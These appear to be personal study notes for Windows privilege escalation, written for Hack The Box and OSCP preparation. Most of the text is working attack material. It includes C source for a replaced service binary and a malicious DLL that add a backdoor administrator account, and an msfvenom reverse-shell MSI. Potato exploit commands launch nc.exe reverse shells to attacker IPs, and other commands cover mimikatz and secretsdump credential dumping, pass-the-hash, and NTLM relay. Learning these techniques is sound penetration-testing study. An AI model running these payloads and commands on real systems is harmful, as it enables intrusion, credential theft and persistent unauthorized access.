Windows Privilege Escalation

HTB Windows Privesc Checklist

Enumerating Windows

Windows Privilege and Access Control

Secure Identifier (SID)
- Value assigned to each entity
- Generated by Local Security Authority for local users and on the DC for domain users
- SID looks like this: S-R-X-Y
  - S indicates an SID
  - R is for revision and is always 1
  - X determines the identity authority (who gave authority) - 5 is NT Authority
  - Y is a bunch of number strings indicating the sub authorities of the entity
    - Example: S-1-5-21-1336799502-1441772794-948155058-1001
      - RID is 1001, indicating second local user created
  - S-1-0-0 = Nobody, S-1-1-0 = Everybody, S-1-5-11 = Authenticated Users, S-1-5-18 = Local system, S-1-5-{domainidentifier}-500 = Administrator
Once a user authenticates, they are granted an access token containing the security context
Security context
- Contains the SID, SIDs of the user’s groups, user and group privileges, and scope info
Integrity Control
- There are four integrity levels
  - System: SYSTEM (kernel)
  - High: Elevated users
  - Medium: Standard users
  - Low: very restricted rights
User Account Control (UAC)
- Windows runs most applications with user privileges (even as Administrator)
- Running programs as Administrator requires a UAC prompt

Collecting Environment Data

Generally try to collect:
- Username/hostname - whoami
- Group memberships of user - Get-LocalGroup
- Existing users/groups - Get-LocalGroupMember {group name}
- OS version and arch - systeminfo
- Network Information - ipconfig /all, route print, netstat -ano or -q
- Installed Applications - Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node{can_be_removed}\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname - displays all removable applications
  - Can remove select displayname to return all info, like file path
- Running Processes - Get-Process
  - Get-Process | Select ProcessName,Path
- Environment Variables!!
  - Get-ChildItem Env:

Searching for Sensitive Information

Check common folders for passwords - it’s pretty common (can use functions below)
- Check hidden directories/files with {dir/ls} -force
Example: search XAMPP for config files (could also do keepass databases or the like):
- Get-ChildItem -Path C:\Users -Include *.txt, *.ini, -File -Recurse -ErrorAction SilentlyContinue -force
Search contents of files
- findstr /si {password/pass/pwd/cred/vnc} *.{txt/ini/xml/config}
Using sensitive information
- Runas - can run commands as a privileged user - this is basically sudo
  - runas /user:{username} {program, like powershell.exe}

Find sensitive PowerShell information

Looking for PowerShell Transcription and PowerShell Script Block Logging
- First basically logs every powershell command entered in plaintext, the second records commands and blocks of script code while executing
- This would be pretty fucking awesome at CCDC as a red teamer, lol
(Get-PSReadlineOption).HistorySavePath - ENTIRE PowerShell history
Event Viewer + Script Block Logging
- Go to Applications and Services Logs > Microsoft > Windows > PowerShell > Operational and scroll through logs
Evil-WinRM
- Basically a better shell that provides pass-the-hash, in-memory loading, file upload/download, etc. from kali
- Download a file with download {filename}
- Upload a file with upload {filename}
- evil-winrm -i {IP} -u {username} -p {password}
- Can also be provided keys
  - evil-winrm -i {IP} -c certificate.pem -k priv-key.pem -S

Automated tools

winPEAS lol
- winpeas.exe --fileanalysis to analyze files
- available at https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe
- host it, download it, run it
- Can miss stuff, and knowing OSCP it will.
PowerUp powershell script
- https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
Seatbelt
- https://github.com/GhostPack/Seatbelt

Leveraging Windows Services

Hijacking Service Binaries

Get-CimInstanceto query services of WMI (Windows Management Instrumentation) class
- Get-CimInstance -ClassName win32_service | Select Name,State,Pathname | Where-Object {$_.State -like 'Running'}
- PowerUp.ps1 (https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) can also identify these (among others)
Check the permissions of the service binaries with icacls or Get-ACL
- icacls "{executable path}"
- F - Full access
- M - Modify Access
- RX - Read/execute access (this is too low)
- R - Read-only access
- W - Write only access
If a user has full control over a binary with higher permissions (like a MySQL daemon), we can edit the executable and it will be run with higher permissions
- This can occur due to full permissions being an easy solution for sysadmins
- This binary can be as simple as creating an administrative user with system()
- sudo apt install mingw-w64
- x86_64-w64-mingw32-gcc newuser.c -o newuser.exe
  - python3 -m http.server
  - iwr -uri http://{kali_IP}:8000/newuser.exe -Outfile newuser.exe

#include <stdlib.h>
int main ()
{
  int i;
  
  i = system ("net user kali Password123! /add");
  i = system ("net localgroup administrators kali /add");
  i = system ("net localgroup "Remote Desktop Users" kali /add");
  
  return 0;
}

Then, move the normal executable out from it’s usual location, move ours in, and then figure out how to restart the service (so it uses the exe)
Restarting the service
- Could be as simple as net stop {service}, but access will likely be denied
- If the service’s StartMode is set to “Auto”, we can reboot the system (if permissions allow)
  - shutdown /r /t 0

Hijacking Service DLLs

Similar to hijacking binaries, can replace DLL with malicious code
Searching for DLLs:
- Get-ItemProperty "HKLM:\SOFTWARE\(optional)Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname to find installed software
- The versions of this software could be vulnerable to DLL hijacking (search it up)
Can also replace missing DLLs with malicious ones
- This can be useful when we find a binary we can’t modify that loads a missing DLL
  - Will likely be looked for in a PATH location (check with $env:path), so we put it there
- We can find missing DLLs by copying user executables to our machine and checking them out with Process Monitor
When making the DLL, we can again simply add an administrative user to the system using something like the following inside of case DLL_PROCESS_ATTACH:
- int i; i = system("net user /ADD tempuser"); i = system("net localgroups administrators /ADD tempuser"); break;
- MinGW can compile C++ code into DLLs with the --shared flag
  - x86_64-w64-mingw32-gcc dll.cpp --shared -o dll.dll

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user kali kali123! /add");
  	    i = system ("net localgroup administrators kali /add");
  	    i = system ("net localgroup "Remote Desktop Users" kali /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

.bat files

Just call an executable inside the batch file

C:\Users\Public\reverseshell.exe

Abusing Unquoted Service Paths

This occurs when we can write to a service’s main directory without being able to modify the current files
Can again be found using wmic in cmd:
- wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
- These will list potentially vulnerable paths
Abusing this:
- Let’s say a service path is in use like “C:\Program Files\Enterprise Agents\Company Files\GammaServ.exe”
- Windows will first check for “C:\Program.exe”, then “C:\Program Files\Enterprise.exe”, then “C:\Program Files\Enterprise Agents\Company.exe”, and finally “C:\Program Files\Enterprise Agents\Company Files\GammaServ.exe”
  - If we can write to the “C:\Program Files\Enterprise Agents\” directory, we can make an executable called Company.exe, which will be used before the real one
- Then, restart the service

Abusing Other Windows Components

Using Scheduled Tasks

Need to know who runs the scheduled tasks, what triggers are required, and what the tasks do
View scheduled tasks with Get-ScheduledTask or schtasks /query /fo LIST /v
- This is a shit ton of info, pipe it into a text file and search through it
  - Can search for {workgroup}\, which will return things authored by people like CLIENTWK220\daveadmin
- Check author of scheduled tasks, tasks to run, and next run time
  - Sometimes, privileged authors can put the executables in modifiable locations
  - Thus, if we replace it, it will be run as a privileged user on next run time
Get startup tasks: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Registry

WinPEAS will output controllable Registry entries, look for
- HKLM\system\currentcontrolset\services\<service> (Interactive [FullControl])
Autorun:
- reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Can check perms with accesschk \accepteula -uvwqk "{path}"
- https://download.sysinternals.com/files/AccessChk.zip
reg query {registry_path}
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v {file_path_entry} /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
AlwaysInstallElevated
- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- If one of these works, do
  - msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={port} --platform windows -f msi > reverse.msi
  - msiexec /quiet /qn /i reverse.msi

Abusing Privileges to Execute Code as Privileged Users

Can either exploit applications, the kernel, or abuse privileges we have
whoami /priv
Privilege Abuse:
- If we have SeImpersonatePrivilege, SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, SeTakeOwnershipPrivilege or SeDebugPrivilege, we can sometimes perform operations in the security context of another user
  - With the SeBackupPrivilege and SeRestorePrivilege, we can read arbitrary files with robocopy: robocopy /b C:\<path to file> .\<filename>
    - We can also just privesc via the following:
    - reg save hklm\sam C:\Users\{current_user}\sam
    - reg save hklm\system C:\Users\{current_user}\system
      - The SAM and SYSTEM will usually be located here:
        
        C:\Windows\repair\SAM
        
        C:\Windows\System32\config\RegBack\SAM
        
        C:\Windows\System32\config\SAM
        
        Can search with dir /s {SAM/SYSTEM}
    - impacket-secretsdump -sam sam -system system LOCAL
  - Use SharpUp to determine which privileges are abusable
  - With SeDebugPrivilege
    - procdump.exe -accepteula -ma lsass.exe lsass.dmp
    - Then, run mimikatz (run log so output is in txt) and run sekurlsa::minidump lsass.dmp
  - With SeTakeOwnershipPrivilege
    - Outlined here: https://academy.hackthebox.com/module/67/section/642
- Named pipes:
  - Allow unrelated processes to share data between each other
  - If we can coerce a a privileged process into connecting to a controlled named pipe, we can capture the authentication and use SeImpersonatePrivilege to impersonate the user account and perform operations in their security context
  - Sigma Potato (PrintSpoofer)
    - Coerces NT AUTHORITY/SYSTEM into a named pipe
    - Must be downloaded somehow
    - Can be used when we have a user with SeImpersonatePrivilege
    - wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
    - .\PrintSpoofer64.exe -i -c powershell.exe
- General Potato information:
  - https://jlajara.gitlab.io/Potatoes_Windows_Privesc
- SweetPotato
  - https://github.com/CCob/SweetPotato
    - Precompiled: https://github.com/uknowsec/SweetPotato
  - Get netcat as well (`/usr/share/windows-resources/binaries/)
  - .\SweetPotato.exe -e EfsRpc -p c:\Users\Public\nc.exe -a "10.10.10.10 1234 -e cmd" works pretty well
- JuicyPotato
  - https://github.com/ohpe/juicy-potato/releases/tag/v0.1
  - C:\Users\Public\JuicyPotato.exe -l 1337 -p C:\Windows\system32\cmd.exe -a "/c C:\Users\Public\nc.exe 10.10.14.235 4444 -e cmd.exe" -t *
- GodPotato
  - Can use for a reverse shell GodPotato.exe -cmd "cmd /c reverse.exe"
    - GodPotato.exe -cmd "powershell -e ...."
  - Can also use it to create a new administrative user, then rdp/winrm in

What to do after escalating privileges?

Credentials Credentials Credentials
- Run WinPEAS again
- Get-ChildItem -Recurse -Filter *.kdbx
Mimikatz can extract password hashes from memory as a basic user
- Prebuilt version here
- Can dump plaintext passwords straight as an Administrator
- Run with .\mimikatz.exe
- privilege::debug gives us the SeDebugPrivilege to run below commands
- token::elevate to elevate to SYSTEM user
- lsadump::sam will dump NTLM hashes of local users
- sekurlsa::logonpasswords will look for clear-text passwords, dump NTLM hashes (including domain users), and dump Kerberos tickets
- One-liner: .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::msv" "lsadump::sam" "exit"
Crack NTLM
- hashcat -m 1000 {hash} {password_list} -r {mutations} --force
Passing NTLM
- Don’t necessarily need to crack the NTLM hash to use it
  - NTLM hashes aren’t salted between sessions and remain static
- Many tools available:
  - SMB enumeration: smbclient and crackmapexec
  - Command execution: impacket -> psexec.py\/wmiexec.py
  - Mimikatz can also pass-the-hash
- Example - accessing SMB share with smbclient
  - smbclient \\\\{IP}\\{SMB_share_endpoint} -U Administrator --pw-nt-hash {hash_from_Mimikatz}
- Example2 - getting a shell as an Administrator with psexec.py
  - Searches for a writeable share and uploads an exe to it, registers exe as a Windows service and starts it
  - impacket-psexec -hashes {32_zeroes}:{hash} {DOMAIN}/{user}@{IP} and
  - impacket-wmiexec -hashes {32_zeroes}:{hash} {DOMAIN}/{user}@{IP}
Cracking Net-NTLMv2
- Useful when we are an unprivileged user
- We have the target start authentication against a machine we own, and capture the hash used during the authentication process
- Responder is a good tool for capturing Net-NTLMv2 hashes
  - Sets up an SMB server that handles auth process and prints hashes
  - sudo responder -I {network interface (like tap0)} to run responder on any given network interface
- Getting the target server to contact our server is tricky
  - With RCE, it’s easy, just run something like dir \\{Our_machine_IP}\share on the machine running the responder server
    - Then, crack the hash with hashcat 5600
  - Without RCE, there are a couple different techniques
    - If there’s a file upload on a webserver on the target, we can use a UNC path (\\{our_IP}\share\xyz) and the application may try to reach out for the file
      - This might not work if the slashes are the wrong way, so try something like //{IP}/share.php as the filename
    - I’d assume local file inclusion would have the same result
- Relay Attack
  - Lets say you’re in a situation where you’re on a local admin account, but it’s an admin on a different machine. Additionally, we can’t crack the hash from the admin.
  - Instead of printing the hash, forward it along using ntlmrelayx
  - sudo impacket-ntlmrelayx --no-http-server -smb2support -t {IP} -c "powershell -enc {base64_command}"
    - This will set up an SMB relay to the IP with a powershell command to run
    - Run SMB dir from the machine we own against the ntlmrelayx machine, which will immediately pass the hash received onto the target machine